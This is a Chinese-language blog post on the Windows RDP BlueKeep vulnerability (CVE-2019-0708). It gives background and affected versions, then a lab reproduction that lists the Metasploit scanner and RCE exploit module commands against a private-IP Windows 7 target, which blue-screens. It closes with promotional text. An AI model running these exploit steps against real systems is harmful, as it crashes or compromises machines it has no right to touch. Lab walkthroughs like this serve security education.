Windows RDP 服务高危漏洞分析 (CVE-2019-0708)
1. 背景
2019 年 5 月 14 日微软官方发布紧急安全补丁,修复了 Windows 远程桌面服务的远程代码执行高危漏洞 CVE-2019-0708(CNVD-2019-14264、CNNVD-201905-434),该漏洞影响了某些旧版本的 Windows 系统。由于该漏洞无需身份验证且无需用户交互,所以这个漏洞可以通过网络蠕虫的方式被利用,利用此漏洞的恶意软件可以从被感染的计算机传播到网络中其他易受攻击的计算机,传播方式与 2017 年 WannaCry 恶意软件的传播方式类似。
2. 影响范围
Windows 7
Windows Server 2008
Windows Server 2008 R2
Windows 2003
Windows XP
漏洞复现:此漏洞已经上传到metasploit
实验准备:kali 192.168.1.180
Win7 192.168.1.133
命令行输入msfconsole后,查找模块
Search 0708
使用分析模块
Use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
Show options
Set RHOSTS 192.168.1.133(靶机ip)
设置攻击模块
Use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
Show options
Set RHOSTS 192.168.1.133
Run
靶机出现蓝屏,说明该漏洞被利用
最后喜欢我文章的朋友请加圈子关注我们,私信关键词:加群。(送免费资料和优惠券)
就会自动分享给你群号。欢迎大家加入我们的安全大家庭。提高大家的安全意识,提升大家的网络安全技能一直是我们的初衷和愿景,让我们共同成为守护信息世界的"SaFeMAN"。
还有可以关注我们微信公众号,在公众号上输入安界网,就可以关注到我们,领取资料和优惠券!
本文来自投稿,不代表本人立场,如若转载,请注明出处:http://www.sosokankan.com/article/1622830.html